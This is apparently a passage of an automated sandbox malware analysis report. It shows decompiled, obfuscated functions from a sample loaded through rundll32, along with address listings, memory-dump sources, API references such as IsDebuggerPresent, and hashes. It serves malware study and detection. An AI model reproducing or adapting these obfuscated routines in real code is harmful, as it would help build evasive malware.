				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t170;
				void* _t181;
				void* _t184;
				void* _t189;
				void* _t192;
				void* _t195;
				void* _t197;
				void* _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int* _t226;

				_push(_a8);
				_t219 = _a4;
				_t195 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t170);
				_v56 = 0xa4c651;
				_t226 =  &(( &_v116)[4]);
				_v56 = _v56 ^ 0x6a6d8bac;
				_v56 = _v56 ^ 0x6ac6bd64;
				_t220 = 0;
				_v60 = 0xbac055;
				_t197 = 0xf39239f;
				_v60 = _v60 << 0xd;
				_v60 = _v60 ^ 0x580542e6;
				_v108 = 0xd580f5;
				_v108 = _v108 ^ 0x97cdda0d;
				_v108 = _v108 + 0x37dd;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 ^ 0x00021113;
				_v52 = 0xf28435;
				_v52 = _v52 | 0x057a1a90;
				_v52 = _v52 ^ 0x05fdc129;
				_v80 = 0x5c8bc8;
				_t221 = 0x27;
				_v80 = _v80 / _t221;
				_t222 = 0x1b;
				_v80 = _v80 * 9;
				_v80 = _v80 ^ 0x0013f028;
				_v96 = 0x281d9a;
				_v96 = _v96 + 0xffff8f77;
				_v96 = _v96 + 0x4719;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xfa152b1c;
				_v112 = 0x7415d8;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 + 0xfffff76c;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000d779a;
				_v88 = 0xb68707;
				_v88 = _v88 ^ 0x45e0ecf4;
				_v88 = _v88 + 0xffff71c0;
				_v88 = _v88 ^ 0x455519c2;
				_v116 = 0xceabf6;
				_v116 = _v116 + 0x1225;
				_v116 = _v116 / _t222;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x0006e3bb;
				_v84 = 0xd525a4;
				_v84 = _v84 + 0xffff1243;
				_v84 = _v84 + 0x1c30;
				_v84 = _v84 ^ 0x00df7efc;
				_v100 = 0xf29ecf;
				_v100 = _v100 << 0xc;
				_v100 = _v100 + 0xffff4e95;
				_v100 = _v100 ^ 0x70d6065d;
				_v100 = _v100 ^ 0x593d89f0;
				_v104 = 0x2206c6;
				_v104 = _v104 | 0x38687435;
				_v104 = _v104 ^ 0xadcf411b;
				_v104 = _v104 ^ 0x9549ac77;
				_v104 = _v104 ^ 0x00e3f730;
				_v92 = 0xd38a43;
				_v92 = _v92 >> 3;
				_v92 = _v92 + 0x6fd1;
				_v92 = _v92 ^ 0x0012c73c;
				_v64 = 0x625266;
				_v64 = _v64 + 0x2436;
				_v64 = _v64 ^ 0x006987c3;
				_v68 = 0xe296bd;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x52d9a139;
				_v72 = 0x54a2fd;
				_v72 = _v72 << 0xd;
				_v72 = _v72 >> 0xa;
				_v72 = _v72 ^ 0x002b3e4c;
				_v76 = 0x32cdcd;
				_v76 = _v76 << 0xb;
				_t223 = 0x32;
				_v76 = _v76 / _t223;
				_v76 = _v76 ^ 0x0302c408;
				_v48 = 0x2d2164;
				_v48 = _v48 + 0xfffff0e0;
				_v48 = _v48 ^ 0x0021ab5a;
				do {
					while(_t197 != 0x2168849) {
						if(_t197 == 0x29fa3de) {
							_t184 = E002D2A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
							_t226 =  &(_t226[3]);
							__eflags = _t184;
							if(__eflags != 0) {
								_t197 = 0x74ac459;
								continue;
							}
						} else {
							if(_t197 == 0x545de14) {
								E002D3DBC( &_v44, _t195, _v56, _v60, _v108);
								_t226 =  &(_t226[3]);
								_t197 = 0x2168849;
								continue;
							} else {
								if(_t197 == 0x6ab10c5) {
									_t189 = E002D2A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
									_t226 =  &(_t226[3]);
									__eflags = _t189;
									if(__eflags != 0) {
										_t197 = 0x29fa3de;
										continue;
									}
								} else {
									if(_t197 == 0x74ac459) {
										_t192 = E002D2A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
										_t226 =  &(_t226[3]);
										__eflags = _t192;
										if(__eflags != 0) {
											_t197 = 0x9dbfb8a;
											continue;
										}
									} else {
										if(_t197 == 0x9dbfb8a) {
											__eflags = E002ED97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
											_t220 =  !=  ? 1 : _t220;
										} else {
											if(_t197 != 0xf39239f) {
												goto L19;
											} else {
												_t197 = 0x545de14;
												continue;
											}
										}
									}
								}
							}
						}
						L22:
						return _t220;
					}
					_t181 = E002D2A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
					_t226 =  &(_t226[3]);
					__eflags = _t181;
					if(__eflags == 0) {
						_t197 = 0x90a774d;
						goto L19;
					} else {
						_t197 = 0x6ab10c5;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t197 - 0x90a774d;
				} while (__eflags != 0);
				goto L22;
			}


































                                                                                                                                  0x002de5d6
                                                                                                                                  0x002de5dd
                                                                                                                                  0x002de5e4
                                                                                                                                  0x002de5e6
                                                                                                                                  0x002de5e7
                                                                                                                                  0x002de5e8
                                                                                                                                  0x002de5e9
                                                                                                                                  0x002de5ee
                                                                                                                                  0x002de5f6
                                                                                                                                  0x002de5f9
                                                                                                                                  0x002de603
                                                                                                                                  0x002de60b
                                                                                                                                  0x002de60d
                                                                                                                                  0x002de615
                                                                                                                                  0x002de61a
                                                                                                                                  0x002de61f
                                                                                                                                  0x002de627
                                                                                                                                  0x002de62f
                                                                                                                                  0x002de637
                                                                                                                                  0x002de63f
                                                                                                                                  0x002de644
                                                                                                                                  0x002de64c
                                                                                                                                  0x002de654
                                                                                                                                  0x002de65c
                                                                                                                                  0x002de664
                                                                                                                                  0x002de672
                                                                                                                                  0x002de677
                                                                                                                                  0x002de682
                                                                                                                                  0x002de683
                                                                                                                                  0x002de687
                                                                                                                                  0x002de68f
                                                                                                                                  0x002de697
                                                                                                                                  0x002de69f
                                                                                                                                  0x002de6a7
                                                                                                                                  0x002de6ac
                                                                                                                                  0x002de6b4
                                                                                                                                  0x002de6bc
                                                                                                                                  0x002de6c1
                                                                                                                                  0x002de6c9
                                                                                                                                  0x002de6ce
                                                                                                                                  0x002de6d6
                                                                                                                                  0x002de6de
                                                                                                                                  0x002de6e6
                                                                                                                                  0x002de6ee
                                                                                                                                  0x002de6f6
                                                                                                                                  0x002de6fe
                                                                                                                                  0x002de70c
                                                                                                                                  0x002de710
                                                                                                                                  0x002de715
                                                                                                                                  0x002de71d
                                                                                                                                  0x002de725
                                                                                                                                  0x002de72d
                                                                                                                                  0x002de735
                                                                                                                                  0x002de73d
                                                                                                                                  0x002de745
                                                                                                                                  0x002de74a
                                                                                                                                  0x002de752
                                                                                                                                  0x002de75a
                                                                                                                                  0x002de762
                                                                                                                                  0x002de76a
                                                                                                                                  0x002de772
                                                                                                                                  0x002de77a
                                                                                                                                  0x002de782
                                                                                                                                  0x002de78a
                                                                                                                                  0x002de792
                                                                                                                                  0x002de797
                                                                                                                                  0x002de79f
                                                                                                                                  0x002de7a7
                                                                                                                                  0x002de7af
                                                                                                                                  0x002de7b9
                                                                                                                                  0x002de7c1
                                                                                                                                  0x002de7c9
                                                                                                                                  0x002de7ce
                                                                                                                                  0x002de7d6
                                                                                                                                  0x002de7de
                                                                                                                                  0x002de7e3
                                                                                                                                  0x002de7e8
                                                                                                                                  0x002de7f0
                                                                                                                                  0x002de7f8
                                                                                                                                  0x002de803
                                                                                                                                  0x002de80b
                                                                                                                                  0x002de80f
                                                                                                                                  0x002de817
                                                                                                                                  0x002de81f
                                                                                                                                  0x002de827
                                                                                                                                  0x002de82f
                                                                                                                                  0x002de82f
                                                                                                                                  0x002de83d
                                                                                                                                  0x002de90f
                                                                                                                                  0x002de914
                                                                                                                                  0x002de917
                                                                                                                                  0x002de919
                                                                                                                                  0x002de91b
                                                                                                                                  0x00000000
                                                                                                                                  0x002de91b
                                                                                                                                  0x002de843
                                                                                                                                  0x002de849
                                                                                                                                  0x002de8e8
                                                                                                                                  0x002de8ed
                                                                                                                                  0x002de8f0
                                                                                                                                  0x00000000
                                                                                                                                  0x002de84f
                                                                                                                                  0x002de855
                                                                                                                                  0x002de8bf
                                                                                                                                  0x002de8c4
                                                                                                                                  0x002de8c7
                                                                                                                                  0x002de8c9
                                                                                                                                  0x002de8cf
                                                                                                                                  0x00000000
                                                                                                                                  0x002de8cf
                                                                                                                                  0x002de857
                                                                                                                                  0x002de85d
                                                                                                                                  0x002de893
                                                                                                                                  0x002de898
                                                                                                                                  0x002de89b
                                                                                                                                  0x002de89d
                                                                                                                                  0x002de8a3
                                                                                                                                  0x00000000
                                                                                                                                  0x002de8a3
                                                                                                                                  0x002de85f
                                                                                                                                  0x002de865
                                                                                                                                  0x002de982
                                                                                                                                  0x002de984
                                                                                                                                  0x002de86b
                                                                                                                                  0x002de871
                                                                                                                                  0x00000000
                                                                                                                                  0x002de877
                                                                                                                                  0x002de877
                                                                                                                                  0x00000000
                                                                                                                                  0x002de877
                                                                                                                                  0x002de871
                                                                                                                                  0x002de865
                                                                                                                                  0x002de85d
                                                                                                                                  0x002de855
                                                                                                                                  0x002de849
                                                                                                                                  0x002de988
                                                                                                                                  0x002de990
                                                                                                                                  0x002de990
                                                                                                                                  0x002de93a
                                                                                                                                  0x002de93f
                                                                                                                                  0x002de942
                                                                                                                                  0x002de944
                                                                                                                                  0x002de950
                                                                                                                                  0x00000000
                                                                                                                                  0x002de946
                                                                                                                                  0x002de946
                                                                                                                                  0x00000000
                                                                                                                                  0x002de946
                                                                                                                                  0x00000000
                                                                                                                                  0x002de955
                                                                                                                                  0x002de955
                                                                                                                                  0x002de955
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 5th8$6$$L>+$Mw$Mw$fRb
                                                                                                                                  • API String ID: 0-3812525031
                                                                                                                                  • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                  • Instruction ID: 6a4706db6a14a280ceb77680b13ba94d96b37d48dda74c2c726460c19e03f473
                                                                                                                                  • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                  • Instruction Fuzzy Hash: 5C9174B2118342DBC794DE61C88945BFBE5FBD4758F108A1EF58296220D7B1CA29CF93
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002F81E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                  • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                                  • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                                  • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                                  • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002F0056 Relevance: 6.7, Strings: 5, Instructions: 443COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002F0056() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				unsigned int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				void* _t500;
				void* _t502;
				intOrPtr* _t509;
				void* _t513;
				signed int _t522;
				intOrPtr _t523;
				intOrPtr* _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				void* _t540;
				void* _t546;
				intOrPtr _t556;
				void* _t603;
				signed int _t605;
				signed int* _t609;

				_t609 =  &_v1748;
				_v1648 = 0xded5e0;
				_v1648 = _v1648 >> 0xb;
				_v1648 = _v1648 | 0x3a1a97de;
				_v1648 = _v1648 ^ 0x3a1a9ff7;
				_v1608 = 0x6694ca;
				_v1608 = _v1608 | 0xdc2b4f48;
				_v1608 = _v1608 ^ 0x5c6fdfcb;
				_v1712 = 0x53f825;
				_v1712 = _v1712 >> 2;
				_v1712 = _v1712 ^ 0x4e440c95;
				_v1712 = _v1712 | 0x7235b0e7;
				_v1712 = _v1712 ^ 0x7e75f2fd;
				_v1632 = 0xc6d169;
				_v1568 = 0;
				_t603 = 0x9805d0a;
				_t525 = 0x52;
				_v1632 = _v1632 / _t525;
				_t526 = 0x67;
				_v1632 = _v1632 * 0x1e;
				_v1632 = _v1632 ^ 0x0048bcfb;
				_v1596 = 0x189afb;
				_v1596 = _v1596 >> 0xe;
				_v1596 = _v1596 ^ 0x000d7c1d;
				_v1724 = 0x4bfed1;
				_v1724 = _v1724 * 0x63;
				_v1724 = _v1724 * 0x55;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x61069d5d;
				_v1580 = 0x401b2b;
				_v1580 = _v1580 + 0x7090;
				_v1580 = _v1580 ^ 0x00412b45;
				_v1672 = 0xbaa782;
				_v1672 = _v1672 / _t526;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 ^ 0x000e5528;
				_v1624 = 0x1efbce;
				_t527 = 0x4f;
				_v1624 = _v1624 / _t527;
				_v1624 = _v1624 ^ 0x000dc160;
				_v1572 = 0x9ef416;
				_t605 = 0x62;
				_v1572 = _v1572 / _t605;
				_v1572 = _v1572 ^ 0x00079814;
				_v1612 = 0x4efe15;
				_t528 = 0x43;
				_v1612 = _v1612 / _t528;
				_v1612 = _v1612 ^ 0x000e5446;
				_v1640 = 0x94326d;
				_t529 = 0x77;
				_v1640 = _v1640 / _t529;
				_t530 = 0x35;
				_v1640 = _v1640 / _t530;
				_v1640 = _v1640 ^ 0x000d83b8;
				_v1676 = 0x511d41;
				_t531 = 9;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 ^ 0xeef8e480;
				_v1676 = _v1676 ^ 0xcb952f57;
				_v1708 = 0x4e0a18;
				_v1708 = _v1708 ^ 0x2110c6ad;
				_v1708 = _v1708 | 0x4a7f48ac;
				_v1708 = _v1708 + 0xffff2cb4;
				_v1708 = _v1708 ^ 0x6b758b76;
				_v1732 = 0x7a6741;
				_t123 =  &_v1732; // 0x7a6741
				_v1732 =  *_t123 / _t531;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 << 7;
				_v1732 = _v1732 ^ 0x36245548;
				_v1700 = 0x42788;
				_t532 = 0x44;
				_v1700 = _v1700 / _t532;
				_v1700 = _v1700 | 0xce808109;
				_v1700 = _v1700 + 0xffff7a0f;
				_v1700 = _v1700 ^ 0xce88d2ed;
				_v1740 = 0x39c25c;
				_v1740 = _v1740 + 0xf71;
				_t533 = 0x75;
				_v1740 = _v1740 / _t533;
				_v1740 = _v1740 ^ 0xc60840fd;
				_v1740 = _v1740 ^ 0xc60d36f5;
				_v1716 = 0x2bcc6c;
				_v1716 = _v1716 + 0x97be;
				_v1716 = _v1716 >> 0xd;
				_v1716 = _v1716 ^ 0xcb020dbc;
				_v1716 = _v1716 ^ 0xcb05808e;
				_v1604 = 0x3f7ac0;
				_v1604 = _v1604 + 0xafc6;
				_v1604 = _v1604 ^ 0x0048c4ef;
				_v1576 = 0x9f011d;
				_v1576 = _v1576 ^ 0x8bb25c52;
				_v1576 = _v1576 ^ 0x8b2a60ae;
				_v1684 = 0xe4045e;
				_v1684 = _v1684 * 0x42;
				_v1684 = _v1684 * 0xc;
				_v1684 = _v1684 ^ 0xc16ccb70;
				_v1720 = 0x76be5;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 * 0x3b;
				_v1720 = _v1720 + 0xffffaa4e;
				_v1720 = _v1720 ^ 0xfff1ea6d;
				_v1680 = 0x1fb4c3;
				_v1680 = _v1680 << 4;
				_v1680 = _v1680 << 0xc;
				_v1680 = _v1680 ^ 0xb4c6c556;
				_v1644 = 0xb0dbcd;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 << 0x10;
				_v1644 = _v1644 ^ 0x800a09c5;
				_v1600 = 0x1a67e8;
				_v1600 = _v1600 | 0xeb4b5744;
				_v1600 = _v1600 ^ 0xeb54c7c0;
				_v1652 = 0x1784b1;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 ^ 0x00082079;
				_v1660 = 0xec7770;
				_v1660 = _v1660 + 0xb190;
				_v1660 = _v1660 | 0x400c0cca;
				_v1660 = _v1660 ^ 0x40ee2104;
				_v1668 = 0xfc9259;
				_v1668 = _v1668 + 0xffffc6b7;
				_v1668 = _v1668 >> 0xe;
				_v1668 = _v1668 ^ 0x000f272a;
				_v1704 = 0xff7fae;
				_v1704 = _v1704 + 0xffff711f;
				_v1704 = _v1704 + 0xffff4b94;
				_v1704 = _v1704 | 0x5a3393fe;
				_v1704 = _v1704 ^ 0x5af53198;
				_v1616 = 0x130067;
				_t534 = 0x4e;
				_v1616 = _v1616 / _t534;
				_v1616 = _v1616 ^ 0x00057283;
				_v1628 = 0x10552;
				_v1628 = _v1628 + 0xf3cd;
				_v1628 = _v1628 + 0x9e6e;
				_v1628 = _v1628 ^ 0x00033ec8;
				_v1636 = 0x95cc92;
				_v1636 = _v1636 >> 0xf;
				_v1636 = _v1636 + 0x9761;
				_v1636 = _v1636 ^ 0x000e6713;
				_v1748 = 0xd7b406;
				_t535 = 0x31;
				_v1748 = _v1748 * 0x46;
				_v1748 = _v1748 << 1;
				_v1748 = _v1748 + 0x479a;
				_v1748 = _v1748 ^ 0x75ff50ef;
				_v1584 = 0xe29275;
				_v1584 = _v1584 * 0x6d;
				_v1584 = _v1584 ^ 0x607f0d3c;
				_v1664 = 0xc2b99a;
				_v1664 = _v1664 / _t605;
				_v1664 = _v1664 | 0xc7d1021c;
				_v1664 = _v1664 ^ 0xc7dc1815;
				_v1692 = 0xa5d2da;
				_v1692 = _v1692 * 0x17;
				_v1692 = _v1692 / _t535;
				_t536 = 0x23;
				_v1692 = _v1692 * 0x3a;
				_v1692 = _v1692 ^ 0x11a891cb;
				_v1656 = 0x680db3;
				_v1656 = _v1656 >> 6;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 ^ 0x000507e8;
				_v1728 = 0x12970f;
				_v1728 = _v1728 + 0xffffbe66;
				_v1728 = _v1728 >> 6;
				_v1728 = _v1728 / _t536;
				_v1728 = _v1728 ^ 0x00053169;
				_v1620 = 0xa87d1b;
				_v1620 = _v1620 + 0xc3ba;
				_v1620 = _v1620 ^ 0x00a7b1ac;
				_v1736 = 0xb206b7;
				_v1736 = _v1736 ^ 0x6f4eb888;
				_t537 = 0x5d;
				_v1736 = _v1736 / _t537;
				_v1736 = _v1736 + 0x173b;
				_v1736 = _v1736 ^ 0x013191a0;
				_v1744 = 0xbf67a7;
				_t538 = 0x70;
				_v1744 = _v1744 / _t538;
				_v1744 = _v1744 | 0x1279871b;
				_v1744 = _v1744 ^ 0x04c3b9b8;
				_v1744 = _v1744 ^ 0x16b0fef0;
				_v1588 = 0x7bc48a;
				_v1588 = _v1588 << 7;
				_v1588 = _v1588 ^ 0x3de90636;
				_v1688 = 0x5dc5eb;
				_v1688 = _v1688 >> 0xb;
				_v1688 = _v1688 + 0xaf87;
				_t539 = 0x6c;
				_t522 = _v1568;
				_v1688 = _v1688 * 0x63;
				_v1688 = _v1688 ^ 0x004fac27;
				_v1696 = 0x311285;
				_v1696 = _v1696 << 0xb;
				_v1696 = _v1696 ^ 0x3061b352;
				_v1696 = _v1696 / _t539;
				_v1696 = _v1696 ^ 0x01b73771;
				_v1592 = 0x977507;
				_v1592 = _v1592 | 0xf9843f0d;
				_v1592 = _v1592 ^ 0xf99a58c3;
				while(1) {
					L1:
					_t540 = 0x5c;
					while(1) {
						L2:
						_t500 = 0x8167d85;
						do {
							L3:
							if(_t603 == 0x2c7b186) {
								E002D1FD1(_v1688, _v1696, _v1592, _v1564);
								_t603 = 0xcf98960;
								goto L18;
							} else {
								if(_t603 == 0x33b45b1) {
									_push(_v1680);
									_push(_v1720);
									_t502 = E002EDCF7(_v1684, 0x2d1080, __eflags);
									_pop(_t546);
									__eflags = E002DAAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
									E002DA8B0(_v1628, _t502, _v1636);
									_t609 =  &(_t609[0xf]);
									L18:
									_t500 = 0x8167d85;
									_t540 = 0x5c;
								} else {
									if(_t603 == _t500) {
										_t509 = E002DF002(2 + E002DCB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E002DCB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
										_t609 =  &(_t609[0xd]);
										__eflags = _t509;
										_t603 = 0x2c7b186;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t603 == 0x9805d0a) {
											_push(_v1672);
											_push(_v1648);
											_push(_v1580);
											_push( &_v520);
											E002E46BB(_v1596, _v1724);
											_t609 = _t609 - 0xc + 0x1c;
											_t603 = 0xc81d40c;
											while(1) {
												L1:
												_t540 = 0x5c;
												goto L2;
											}
										} else {
											if(_t603 == 0xaea35f7) {
												_t523 =  *0x2f3e10; // 0x0
												_t524 = _t523 + 0x1c;
												while(1) {
													__eflags =  *_t524 - _t540;
													if(__eflags == 0) {
														break;
													}
													_t524 = _t524 + 2;
													__eflags = _t524;
												}
												_t522 = _t524 + 2;
												_t603 = 0x33b45b1;
												goto L2;
											} else {
												_t618 = _t603 - 0xc81d40c;
												if(_t603 == 0xc81d40c) {
													_push(_v1612);
													_push(_v1572);
													_t513 = E002EDCF7(_v1624, 0x2d1020, _t618);
													E002E176B( &_v1040, _t618);
													_t556 =  *0x2f3e10; // 0x0
													_t403 = _t556 + 0x1c; // 0x1c
													_t404 = _t556 + 0x23c; // 0x23c
													E002E1652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
													E002DA8B0(_v1604, _t513, _v1576);
													_t609 =  &(_t609[0xf]);
													_t603 = 0xaea35f7;
													while(1) {
														L1:
														_t540 = 0x5c;
														L2:
														_t500 = 0x8167d85;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							__eflags = _t603 - 0xcf98960;
						} while (__eflags != 0);
						return _v1568;
					}
				}
			}

















































































                                                                                                                                  0x002f0056
                                                                                                                                  0x002f005c
                                                                                                                                  0x002f0066
                                                                                                                                  0x002f006d
                                                                                                                                  0x002f0075
                                                                                                                                  0x002f007d
                                                                                                                                  0x002f0088
                                                                                                                                  0x002f0093
                                                                                                                                  0x002f009e
                                                                                                                                  0x002f00a6
                                                                                                                                  0x002f00ab
                                                                                                                                  0x002f00b3
                                                                                                                                  0x002f00bb
                                                                                                                                  0x002f00c3
                                                                                                                                  0x002f00cf
                                                                                                                                  0x002f00d6
                                                                                                                                  0x002f00e4
                                                                                                                                  0x002f00e9
                                                                                                                                  0x002f00fa
                                                                                                                                  0x002f00fd
                                                                                                                                  0x002f0104
                                                                                                                                  0x002f010f
                                                                                                                                  0x002f011a
                                                                                                                                  0x002f0122
                                                                                                                                  0x002f012d
                                                                                                                                  0x002f013a
                                                                                                                                  0x002f0143
                                                                                                                                  0x002f0147
                                                                                                                                  0x002f014b
                                                                                                                                  0x002f0153
                                                                                                                                  0x002f015e
                                                                                                                                  0x002f0169
                                                                                                                                  0x002f0174
                                                                                                                                  0x002f0184
                                                                                                                                  0x002f0188
                                                                                                                                  0x002f018d
                                                                                                                                  0x002f0195
                                                                                                                                  0x002f01a7
                                                                                                                                  0x002f01ac
                                                                                                                                  0x002f01b5
                                                                                                                                  0x002f01c0
                                                                                                                                  0x002f01d2
                                                                                                                                  0x002f01d7
                                                                                                                                  0x002f01e0
                                                                                                                                  0x002f01eb
                                                                                                                                  0x002f01fd
                                                                                                                                  0x002f0202
                                                                                                                                  0x002f020b
                                                                                                                                  0x002f0216
                                                                                                                                  0x002f0228
                                                                                                                                  0x002f022b
                                                                                                                                  0x002f0237
                                                                                                                                  0x002f023c
                                                                                                                                  0x002f0245
                                                                                                                                  0x002f0250
                                                                                                                                  0x002f025d
                                                                                                                                  0x002f0260
                                                                                                                                  0x002f0264
                                                                                                                                  0x002f026c
                                                                                                                                  0x002f0274
                                                                                                                                  0x002f027c
                                                                                                                                  0x002f0284
                                                                                                                                  0x002f028c
                                                                                                                                  0x002f0294
                                                                                                                                  0x002f029c
                                                                                                                                  0x002f02a4
                                                                                                                                  0x002f02ac
                                                                                                                                  0x002f02b0
                                                                                                                                  0x002f02b5
                                                                                                                                  0x002f02ba
                                                                                                                                  0x002f02c2
                                                                                                                                  0x002f02ce
                                                                                                                                  0x002f02d3
                                                                                                                                  0x002f02d9
                                                                                                                                  0x002f02e1
                                                                                                                                  0x002f02e9
                                                                                                                                  0x002f02f1
                                                                                                                                  0x002f02f9
                                                                                                                                  0x002f0305
                                                                                                                                  0x002f0308
                                                                                                                                  0x002f030c
                                                                                                                                  0x002f0314
                                                                                                                                  0x002f031c
                                                                                                                                  0x002f0324
                                                                                                                                  0x002f032c
                                                                                                                                  0x002f0331
                                                                                                                                  0x002f0339
                                                                                                                                  0x002f0341
                                                                                                                                  0x002f034c
                                                                                                                                  0x002f0357
                                                                                                                                  0x002f0362
                                                                                                                                  0x002f036d
                                                                                                                                  0x002f0378
                                                                                                                                  0x002f0383
                                                                                                                                  0x002f0390
                                                                                                                                  0x002f0399
                                                                                                                                  0x002f039d
                                                                                                                                  0x002f03a5
                                                                                                                                  0x002f03ad
                                                                                                                                  0x002f03b7
                                                                                                                                  0x002f03bb
                                                                                                                                  0x002f03c3
                                                                                                                                  0x002f03cb
                                                                                                                                  0x002f03d3
                                                                                                                                  0x002f03d8
                                                                                                                                  0x002f03dd
                                                                                                                                  0x002f03e5
                                                                                                                                  0x002f03ed
                                                                                                                                  0x002f03f2
                                                                                                                                  0x002f03f7
                                                                                                                                  0x002f03ff
                                                                                                                                  0x002f040a
